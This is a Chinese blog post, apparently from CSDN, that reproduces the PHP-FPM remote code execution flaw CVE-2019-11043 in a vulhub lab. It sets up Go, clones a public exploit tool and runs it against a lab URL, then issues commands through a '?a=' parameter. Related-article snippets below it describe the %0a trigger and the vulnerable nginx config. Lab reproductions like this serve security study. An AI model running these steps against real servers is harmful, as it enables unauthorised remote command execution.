PHP-FPM 远程代码执行漏洞(CVE-2019-11043)复现

最新推荐文章于 2024-09-10 19:28:28 发布
最新推荐文章于 2024-09-10 19:28:28 发布
阅读量380 收藏 2
点赞数 9
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Nai_zui_jiang/article/details/142032621
版权

启动环境

切换目录到vulhub/php/CVE-2019-11043下

查看端口

访问

安装漏洞利用工具

git clone https://github.com/neex/phuip-fpizdam.git

安装go语言

# 1、下载go,这里使用 go1.22.5 版本,可替换为最新版本
wget https://dl.google.com/go/go1.22.5.linux-amd64.tar.gz
 
# 2、解压
tar -C /usr/local -zxvf go1.22.5.linux-amd64.tar.gz
 
# 3、设置环境变量
echo 'export GOROOT=/usr/local/go' >> /etc/profile
echo 'export PATH=$PATH:$GOROOT/bin' >> /etc/profile
echo 'export GOPATH=$HOME/go' >> /etc/profile
 
# 4、当前shell生效(或重启系统使环境变量永久生效)
source /etc/profile
 
# 5、验证是否安装成功
go version
 
# 6、启用go模块
go env -w GO111MODULE=on
 
# 7、设置代理,以便国内下载依赖包加速
go env -w GOPROXY=https://goproxy.cn,direct

 攻击

go run . "http://ip地址:8080//index.php"

浏览器进行访问,成功复现,输入?a=命令

嘤嘤奶嘴酱
关注
  • 9
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP-FPM 远程代码执行漏洞CVE-2019-11043
qq_43571759的博客
05-24 637
PHP-FPM 远程代码执行漏洞CVE-2019-11043) 文章目录PHP-FPM 远程代码执行漏洞CVE-2019-11043漏洞分析漏洞利用漏洞修复 在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。 在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码漏洞分析 首先使用docker搭建漏洞环境,进入
PHP-fpm远程代码执行漏洞(CVE-2019-11043)
老北京砸酱锤的博客
06-22 983
漏洞介绍 Nginx 上 fastcgi_split_path_info 在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致 PATH_INFO 为空。而 php-fpm 在处理 PATH_INFO 为空的情况下,存在逻辑缺陷。攻击者通过精心的构造和利用,可以导致远程代码执行。 Nginx+php-fpm的服务器,在使用如下配置的时候,可能存在远程代码执行漏洞漏洞复现 使用vulhub复现漏洞,进入CVE-2019-11043文件夹下(cd /home/apple/vulhub/ph
漏洞复现PHP-FPM 远程代码执行漏洞CVE-2019-11043
Hi~ 土拨鼠
12-26 579
文章目录一、漏洞简介二、漏洞环境准备三、漏洞复现 一、漏洞简介 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。 向Nginx + PHP-FPM的服务器 URL发送换行符%0a 时,服务器返回异常。该漏洞需要在nginx.conf 中进行特定配置才能触发。具体配置如下: location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.p
CVE漏洞复现-CVE-2019-11043-PHP-FPM 远程代码执行漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-27 991
来自Wallarm的安全研究员Andrew Danau在9月14-16号举办的Real World CTF中,意外的向服务器发送%0a(换行符)时,服务器返回异常信息。由此发现了这个0day漏洞当使用特定的 fastcgi 配置时,存在远程代码执行漏洞,但这个配置并非是Nginx的默认配置。只有当fastcgi_split_path_info 字段被配置为 ^(.+?时,攻击者可以通过精心构造的payload,造成远程代码执行漏洞。由于该配置已被广泛使用,所以危害较大。
PHP-FPM远程命令执行 CVE-2019-11043 漏洞复现
ADummy的博客
02-26 198
PHP-FPM远程命令执行CVE-2019-11043) by ADummy 0x00利用路线 ​ 安装go环境—>下载利用工具—>写入shell—>getshell 0x01漏洞介绍 ​ 漏洞主要由于 PHP-FPM 中 sapi/ fpm/ fpm/ fpm_main.c 文件内的 env_path_info 下溢导致,攻击者可以使用换行符 %0a 破坏 Nginx 中 fastcgi_split_path_info 对应的正则表达式,导致传递给 PHP-FPM 的 PATH_
php漏洞cve,PHP-fpm 远程代码执行漏洞(CVE-2019-11043)分析
weixin_34462016的博客
03-09 429
作者:LoRexxar'@知道创宇404实验室时间:2019年10月25日国外安全研究员 Andrew Danau在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞2019年10月23日,github公开漏洞相关的详情以及exp。当nginx配置不当时,会导致php-fpm远程任意代码执行。下面我们就来一点点看看漏洞的详细分析,文章中漏洞分析部...
CVE-2019-11043PHP远程代码执行漏洞
m0_51468027的博客
02-12 9014
一、漏洞描述   CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。   向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。   该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下: location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_
php漏洞cve,PHP-fpm远程代码执行漏洞(CVE-2019-11043)分析
weixin_39585795的博客
03-09 245
国外安全研究员 Andrew Danau在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞2019年10月23日,github公开漏洞相关的详情以及exp。当nginx配置不当时,会导致php-fpm远程任意代码执行。下面我们就来一点点看看漏洞的详细分析,文章中漏洞分析部分感谢团队小伙伴@Hcamael#知道创宇404实验室漏洞复现为了能更方便...
Ngnix PHP-FPM 远程代码执行漏洞复现(CVE-2019-11043)
K8哥哥
12-26 919
漏洞简介 PHP-FPM 远程代码执行漏洞(CVE-2019-11043) 在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。 在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。 Example 和Lad...
CVE-2019-11043 PHP-fpm 远程代码执行漏洞复现
afei001
01-21 394
目录 1.漏洞概述 2.漏洞原理 3.影响版本 4.漏洞等级 5.漏洞复现 5.1 Vulnhub搭建CVE-2019-11043漏洞环境 5.2 CVE-2019-11043漏洞利用 (1)phuip-fpizdam工具利用 (2)github CVE-2019-11043_RCE_1.py (3)CVE-2019-11043_RCE_2.py 6.漏洞修复 1.漏洞概述 在长亭科技举办的 Real World CTF中,国外安全研究员 Andrew Dana...
PHP-CGI Windows平台远程代码执行漏洞复现(CVE-2024-4577)
0xSec
06-08 3051
2024年6月,PHP官方发布新版本,修复了PHP-CGI中一个远程代码执行漏洞。鉴于该漏洞无前置条件,易于利用,且默认情况下可获取操作系统权限,建议所有使用受影响版本的企业尽快升级修复,以确保安全。
php-fpm漏洞复现CVE-2019-11043)
frinck的博客
11-08 1435
1.php-fpm漏洞详情 当nginx使用特定的fastcgi配置的时候,就会存在远程代码执行漏洞,但是这个配置并不是默认配置 fastcgi_split_path_info字段配置为^(.+?\.php)(/.*)$;时,攻击者可以通过精心构造playload造成远程代码执行,改配置已经被广泛使用,危害较大。 2.复现 安装docker环境 git clone https://gith...
PHP 远程代码执行漏洞复现CVE-2019-11043
热门推荐
wo41ge的博客
02-05 1万+
漏洞名称 PHP 远程代码执行漏洞复现CVE-2019-11043 准备工作:安装 docker sudo apt-get install docker docker-compose 我这边已经安装过了 查看一下docker的版本 安装golang 环境 sudo apt install golang 搭建漏洞环境 git clone https://github.com/vulhub/vulhub.git cd vulhub/php/CVE-2019-11043 docker-compose up -d
攻防世界 Web_php_unserialize
beiweixiaotian66的博客
09-07 577
因为GET传参还要经过一个Base64的解码,所以对这个表达式还要经过base64的加密。因为前面还有个正则表达式,所以我们还需要绕过这个正则表达式,使用。然后我们知道怎么绕过了,可不可以直接自己手动绕过,base加密捏。如果表示对象属性个数的值大于真实的属性个数时,就可以绕过。代表着后面的变量名长度应是10,但好像只有八位?表示空字符,但是还是占用一个字符位置。但是这样的base和上面不一样。,这样base出来就是一样的了。方法,写一个反序列化的脚本。这道题我们需要的文件是。,所以我们主要需要绕过。
[极客大挑战 2019]Http
最新发布
2201_75556700的博客
09-10 291
3、访问Secret.php发现页面有提示,它说它不是来自这个网页。6、添加X-Forwarded-For: 127.0.0.1。5、修改User-Agent为:Syclover。2、查看页面源码发现一个。
JAVA—网络通信
Hismybestlove的博客
09-05 1486
本文是学习网络通信入门和简单了解UDP协议和TCP协议,学习和了解CS架构和简单了解BS架构和HTTP协议
以太坊开发环境
禅与代码的艺术
09-07 1176
详细讨论了以太坊测试网络和私有网络。在初步介绍了私有网络设置之后,演示了如何使用 Geth 命令行工具执行各种功能,以及如何与以太坊区块链进行交互。还讨论了如何使用 Mist 来部署合约和发送交易。
Thinkphp5实现一周签到打卡功能
Crazy_shark的博客
09-10 335
以上是一个简单的 ThinkPHP5 实现一周签到打卡功能的示例。通过设计合适的数据库结构和控制器逻辑,你可以轻松实现用户签到和连续签到天数统计功能。在实际应用中,可能需要考虑更多的细节,如用户身份验证、签到奖励、接口优化等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值